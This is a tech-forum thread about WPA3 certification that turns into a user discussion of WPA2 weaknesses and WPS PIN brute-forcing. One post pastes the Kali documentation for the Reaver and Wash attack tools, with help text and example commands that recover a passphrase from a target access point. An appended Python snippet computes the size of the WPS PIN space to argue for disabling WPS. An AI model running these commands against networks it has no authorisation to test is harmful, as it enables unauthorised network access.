Wi-Fi security is starting to get its biggest upgrade in over a decade (WPA3 certification starts today)

LASER_oneXM

Wi-Fi devices have been using the same security protocol for over a decade. But today, that’ll begin to change: the Wi-Fi Alliance, which oversees adoption of the Wi-Fi standard, is beginning to certify products that support WPA3, the successor to the WPA2 security protocol that’s been in use since 2004.

The new protocol provides a number of additional protections for devices connected over Wi-Fi. One big improvement makes it harder for hackers to crack your password by guessing it over and over again, and another limits what data hackers can see even once they’ve uncovered the passcode. Nothing will change as far as users see it; you’ll still just type in your password and connect to the network.
WPA3 protections won’t just flip on overnight — in fact, it’s going to be a many-years-long process. First, you’ll have to buy a new router that supports WPA3 (or hope that your old one is updated to support it). The same goes for all your gadgets; you’ll have to buy new ones that support WPA3, or hope your old ones are updated. Fortunately, devices that support WPA3 can still connect with devices that use WPA2, so your gadgets shouldn’t suddenly stop working because you brought something new into the house.

The first big new feature in WPA3 is protection against offline, password-guessing attacks. This is where an attacker captures data from your Wi-Fi stream, brings it back to a private computer, and guesses passwords over and over again until they find a match. With WPA3, attackers are only supposed to be able to make a single guess against that offline data before it becomes useless; they’ll instead have to interact with the live Wi-Fi device every time they want to make a guess. (And that’s harder since they need to be physically present, and devices can be set up to protect against repeat guesses.)
 

yitworths


If WPA3 is resistant to dictionary attacks then there must have been some changes in the handshake method. tbh, Wi-Fi in general is vulnerable; I'm not sure how many changes have been introduced at the core. If you are using Wi-Fi, please try to use a reliable VPN even if you are not using public Wi-Fi. There are many other ways to hack your Wi-Fi connection; dictionary is just one. I've found many Wi-Fi routers get reset to their defaults if I constantly attack with denial of service, and after that brute force won't be that hard. Always use a WPS-locked AP to be secure against that sort of attack.
 

Hi Brothers

Disable it through the router's web management page. btw, a DoS attack can still reset your PIN to its default value, but you will be immune against brute-force attacks.

Then what's the point? Just use a strong password; that thing ain't getting brute-forced anytime soon. For example, Dashlane automatically generates up to 28-character passwords with letters, symbols, and numbers, but you can always combine a few of those until you hit your router's max password length limit. Am I understanding this right?
 

yitworths

Then what's the point? Just use a strong password; that thing ain't getting brute-forced anytime soon. For example, Dashlane automatically generates up to 28-character passwords with letters, symbols, and numbers, but you can always combine a few of those until you hit your router's max password length limit. Am I understanding this right?

We are talking about completely different things. A dictionary attack is not the same as a PIN brute-force. Even if you use a long passphrase you are still vulnerable to PIN brute-force; through PIN brute-force your long passphrase can get hacked. A long passphrase is good practice & provides greater resistance against dictionary attacks. But PIN brute-force doesn't need your passphrase to crack your AP.
 

SumTingWong

Do we need a new router for WPA3, or is it going to be a firmware update on current WPA2 routers?
 

CyberTech

Do we need a new router for WPA3, or is it going to be a firmware update on current WPA2 routers?

First, you’ll have to buy a new router that supports WPA3 (or hope that your old one is updated to support it). The same goes for all your gadgets; you’ll have to buy new ones that support WPA3, or hope your old ones are updated. Fortunately, devices that support WPA3 can still connect with devices that use WPA2, so your gadgets shouldn’t suddenly stop working because you brought something new into the house.
 

yitworths

@CyberTech I guess I will stick with WPA2 for a while.

Do you think your connection is under threat? I mean, do you use your WPA2 surrounded by some hackers? If not, you are all OK for now.

WPA2 falls victim to dictionary attacks due to its handshake method. It uses a 4-way handshake. Even if you change your passphrase it still uses the same key to access a particular client every time. Now, that's something which really makes hackers very happy. tbh, if I have a handshake, theoretically I've got your passphrase. & trust me, capturing a handshake ain't that hard. As I've already mentioned, there are many flaws in Wi-Fi & I hope WPA3 isn't just hype. I still don't have enough info to pass comment on it, but on the surface I ain't seeing many changes except the handshake method.
 

SumTingWong

Do you think your connection is under threat? I mean, do you use your WPA2 surrounded by some hackers? If not, you are all OK for now.

WPA2 falls victim to dictionary attacks due to its handshake method. It uses a 4-way handshake. Even if you change your passphrase it still uses the same key to access a particular client every time. Now, that's something which really makes hackers very happy. tbh, if I have a handshake, theoretically I've got your passphrase. & trust me, capturing a handshake ain't that hard. As I've already mentioned, there are many flaws in Wi-Fi & I hope WPA3 isn't just hype. I still don't have enough info to pass comment on it, but on the surface I ain't seeing many changes except the handshake method.

I don't live surrounded by some hackers as far as I can tell. If I want to upgrade to WPA3, I will need to get a 3rd-party router (unless my ISP provides one), and switch from the coax line to an Ethernet line (cable needed).
 

yitworths

I don't live surrounded by some hackers as far as I can tell. If I want to upgrade to WPA3, I will need to get a 3rd-party router (unless my ISP provides one), and switch from the coax line to an Ethernet line (cable needed).

So, you are on a coax line... I've never used coax, nor do I know any advantage of it over Ethernet. But don't ya think Ethernet would be the better choice between these two?
 

SumTingWong

So, you are on a coax line... I've never used coax, nor do I know any advantage of it over Ethernet. But don't ya think Ethernet would be the better choice between these two?

You only need an Ethernet line if you are planning to use a 3rd-party router and speeds over 100 Mbps. Yes, I use the coax line for my ISP router because I have no intention of using a 3rd-party router right now and my speed is 100 Mbps. You can easily switch between the Ethernet and coax line if you can locate the port on the ONT box and call your ISP to deactivate one of them on their end, because you can't have the Ethernet and coax line active at the same time. In terms of speed, there's no difference between the Ethernet line and the coax line. Coax is old, and Ethernet is new. My ISP installed the coax line when I signed up for the service.

ONT box > coax line > router > ethernet cable > my PC.
 

xSploit

So, you are on a coax line... I've never used coax, nor do I know any advantage of it over Ethernet. But don't ya think Ethernet would be the better choice between these two?
It is commonly used in a hybrid fiber-coaxial (HFC) network. Data is transferred electrically over the inner conductor, and it has 80X more transmission capacity than twisted-pair cables. The cost is slightly higher than twisted pair, but it is still considered more economical than fiber.

You can read more about it here: https://www.cablinginstall.com/arti...e-of-coaxial-cable-in-broadband-networks.html
 

yitworths

WPA3, over time it will be vulnerable; it is also just a matter of time. :giggle:

Days are gone when dictionary attacks were used to crack the passwords.
REAVER is enough to crack these, since it works on finding the WPS PIN of the router with a 95%+ success rate (personally tested as well).
Before WPA3, security researchers should disable WPS functionality in all the routers.
All the big names belong to that list, including Belkin and Cisco.
Remove WPS * Use alphanumerics with symbols in the passkey * Never use WEP * -- SAFE

Reaver
February 18, 2014 | Stress Testing, Wireless Attacks
Reaver Package Description
Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases, as described in http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf.
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.
Source: Google Code Archive - Long-term storage for Google Code Project Hosting.
Reaver Homepage | Kali Reaver Repo
  • Author: Tactical Network Solutions, Craig Heffner
  • License: GPLv2
Tools included in the reaver package
reaver – WiFi Protected Setup Attack Tool
root@kali:~# reaver -h

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
-i, --interface=<wlan> Name of the monitor-mode interface to use
-b, --bssid=<mac> BSSID of the target AP

Optional Arguments:
-m, --mac=<mac> MAC of the host system
-e, --essid=<ssid> ESSID of the target AP
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
-o, --out-file=<file> Send output to a log file [stdout]
-s, --session=<file> Restore a previous session file
-C, --exec=<command> Execute the supplied command upon successful pin recovery
-D, --daemonize Daemonize reaver
-a, --auto Auto detect the best advanced options for the target AP
-f, --fixed Disable channel hopping
-5, --5ghz Use 5GHz 802.11 channels
-v, --verbose Display non-critical warnings (-vv for more)
-q, --quiet Only display critical messages
-h, --help Show help

Advanced Options:
-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
-d, --delay=<seconds> Set the delay between pin attempts [1]
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
-g, --max-attempts=<num> Quit after num pin attempts
-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
-t, --timeout=<seconds> Set the receive timeout period [5]
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
-A, --no-associate Do not associate with the AP (association must be done by another application)
-N, --no-nacks Do not send NACK messages when out of order packets are received
-S, --dh-small Use small DH keys to improve crack speed
-L, --ignore-locks Ignore locked state reported by the target AP
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
-n, --nack Target AP always sends a NACK [Auto]
-w, --win7 Mimic a Windows 7 registrar [False]

Example:
reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv
wash – WiFi Protected Setup Scan Tool
root@kali:~# wash -h

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
-i, --interface=<iface> Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files

Optional Arguments:
-c, --channel=<num> Channel to listen on [auto]
-o, --out-file=<file> Write data to file
-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
-D, --daemonize Daemonize wash
-C, --ignore-fcs Ignore frame checksum errors
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-h, --help Show help

Example:
wash -i mon0
wash Usage Example
Scan for networks using the monitor mode interface (-i mon0) on channel 6 (-c 6), while ignoring frame checksum errors (-C):
root@kali:~# wash -i mon0 -c 6 -C

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
E0:3F:49:6A:57:78 6 -73 1.0 No ASUS
reaver Usage Example
Use the monitor mode interface (-i mon0) to attack the access point (-b E0:3F:49:6A:57:78), displaying verbose output (-v):
root@kali:~# reaver -i mon0 -b E0:3F:49:6A:57:78 -v

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from E0:3F:49:6A:57:78
[+] Associated with E0:3F:49:6A:57:78 (ESSID: ASUS)
[+] Trying pin 12345670
+
+
+ Pin found-89988762
Passkey: **********


It's not as easy as it may seem. Many APs get locked after some consecutive failures. If WPS is disabled, then you have no luck either. & in the case of a dictionary attack, whether the AP is locked or not is immaterial. But a dictionary attack demands more resources also. reaver or bully work differently, but you need a DoS attack along with these two to crack a WPS-enabled AP. & any seasoned hacker can MITM or social engineer many users, but in the case of a WPS-disabled AP there is no way to PIN-brute-force it.
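An added example, not code from the thread or from the Reaver project, that puts numbers behind the "long passphrase does not help against PIN brute-force" and "APs lock after consecutive failures" points above: the WPS PIN checksum rule and the split-halves verification described in the Viehböck paper linked from the Reaver description shrink the PIN space to about 11,000 online guesses regardless of passphrase length, which is why the mitigation is disabling WPS (or at least locking it), not a longer password. The `time_for_guesses` lockout model is a hypothetical AP policy, not any vendor's.

```python
# Added example (not from the thread or the Reaver project). Checksum rule and
# split-halves verification follow the Viehböck WPS paper cited by the Reaver
# package description; the lockout model below is a hypothetical AP policy.

WEIGHTS = (3, 1, 3, 1, 3, 1, 3)  # weights applied to the first seven PIN digits


def wps_checksum_digit(first_seven: str) -> int:
    """Return the 8th digit that makes a 7-digit prefix a checksum-valid WPS PIN."""
    if len(first_seven) != 7 or not first_seven.isdigit():
        raise ValueError("expected exactly seven decimal digits")
    total = sum(w * int(d) for w, d in zip(WEIGHTS, first_seven))
    return (10 - total % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True when an 8-digit PIN carries the correct checksum digit (e.g. 12345670)."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum_digit(pin[:7])


def worst_case_guesses(halves_verified_separately: bool) -> int:
    """Upper bound on online PIN attempts an AP would have to answer.

    The registrar protocol rejects a wrong first half before the second half is
    ever checked, so the halves are guessed independently: 10^4 for the first
    four digits, then only 10^3 for the last four because the checksum digit is
    derived. Without that leak every checksum-valid PIN (10^7) would be a candidate.
    Note that neither figure depends on the WPA2 passphrase at all.
    """
    return 10**4 + 10**3 if halves_verified_separately else 10**7


def time_for_guesses(guesses: int, seconds_per_attempt: float,
                     lock_seconds: float = 0.0, attempts_before_lock: int = 0) -> float:
    """Seconds needed for `guesses` online attempts under a hypothetical AP lockout.

    seconds_per_attempt mirrors the per-attempt delay in the reaver help text;
    lock_seconds/attempts_before_lock model an AP that suspends WPS for
    lock_seconds after every attempts_before_lock failures (0 = no lockout).
    """
    total = guesses * seconds_per_attempt
    if attempts_before_lock > 0 and lock_seconds > 0:
        total += (guesses // attempts_before_lock) * lock_seconds
    return total


if __name__ == "__main__":
    n = worst_case_guesses(True)
    print(f"worst case {n} guesses; no lockout: {time_for_guesses(n, 1.0) / 3600:.1f} h; "
          f"60 s lock per 3 failures: {time_for_guesses(n, 1.0, 60.0, 3) / 86400:.1f} days")
```

Compare the no-lockout figure with the 4-10 hours the Reaver description quotes; a lockout policy stretches the same search by more than an order of magnitude, while disabling WPS removes it entirely.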
 
